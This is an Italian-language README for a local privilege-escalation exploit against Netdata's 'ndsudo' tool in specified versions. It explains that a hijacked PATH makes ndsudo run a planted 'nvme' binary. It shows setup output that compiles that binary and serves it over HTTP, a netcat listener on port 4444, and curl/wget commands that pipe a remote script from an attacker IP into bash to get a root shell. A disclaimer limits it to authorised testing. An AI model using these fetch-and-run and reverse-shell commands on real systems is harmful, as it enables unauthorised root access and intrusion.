
Script Bash per l'Escalation dei privilegi tramite "ndsudo" (Netdata Local Exploit)
Script Bash per Privilege Escalation tramite "ndsudo" (Exploit Locale Netdata)
>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169
Lo strumento "ndsudo" esegue un insieme ristretto di comandi esterni, ma i percorsi di ricerca sono forniti dalle variabili d'ambiente "PATH". Modificando la variabile d'ambiente "PATH" in un percorso a cui abbiamo accesso, possiamo controllare dove ndsudo cerca i comandi e crearne uno che contenga codice malevolo.
Questo exploit si basa sul presupposto che la macchina target e la macchina attaccante siano sulla stessa rete.
Possiamo generare e distribuire automaticamente il file necessario per l'attacco eseguendo lo script "setup_exploit_server.sh"
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
Questo script creerà tutti i file necessari per l'attacco configurati con il tuo indirizzo IP.
Dopo aver distribuito il nostro server web, avviamo un listener su un'altra shell:
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
A seconda del nostro client HTTP, possiamo scaricare ed eseguire il nostro exploit.
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
Se tutto è stato fatto correttamente, ora dovremmo avere una shell di root.

Questa prova di concetto è solo per scopi educativi e di test autorizzati.
L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai esplicito permesso di test è illegale.
Gli autori non sono responsabili per qualsiasi uso improprio di queste informazioni.